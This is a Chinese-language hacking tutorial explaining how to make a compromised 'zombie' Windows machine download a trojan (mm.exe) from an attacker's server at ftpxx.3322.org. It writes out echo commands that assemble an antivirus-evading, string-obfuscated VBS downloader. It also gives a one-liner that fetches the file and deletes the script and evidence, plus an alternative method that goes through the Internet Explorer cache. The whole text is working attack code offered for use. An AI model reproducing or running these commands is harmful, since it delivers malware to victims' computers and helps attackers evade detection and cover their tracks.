2.html下载
这儿是使用肉鸡system32目录下的wscript.exe来执行指定的vbs脚本访问我们放置木马的http服务器。

假设木马地址为:http://ftpxx.3322.org/mm.exe mm.exe

通过命令行(无需任何修改，我已做免杀，除非被杀了，可以修改脚本）

＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝
@echo with wscript:if .arguments.count^<2-0+0-0+0 then .quit:end if > thisis.vbs
@echo set aso=.createobject("adodb.stream"):set thisisweb=createobject("mi"+"cr"+"o"+"s"+"o"+"ft.x"+"ml"+"h"+"ttp") >> thisis.vbs
@echo thisisweb.open "g"+"e"+"t",.arguments(0),0:thisisweb.send:if thisisweb.status^>200 then .echo "E"+"r"+"r"+"o"+"r"+":"+thisisweb.status:.quit>> thisis.vbs
@echo aso.type=1-0+0-0+0:aso.open:aso.write thisisweb.responsebody:aso.savetofile .arguments(1-0+0-0+0),2-0+0-0+0:end with >> thisis.vbs
Type thisis.vbs
＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝
下一步是执行木马并删除记录：
也就是一句话(三个语句）:
cscript thisis.vbs http://ftpxx.3322.org/mm.exe mm.exe & del thisis.vbs & del mm.exe

或者简单的方法是(会弹出网页!):
START its:http://ftpxx.3322.org/mm.exe
下载后，
DIR /A /S "C:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5\*.EXE"
列出路径后，执行。
这儿帐号Default User也可能是当前用户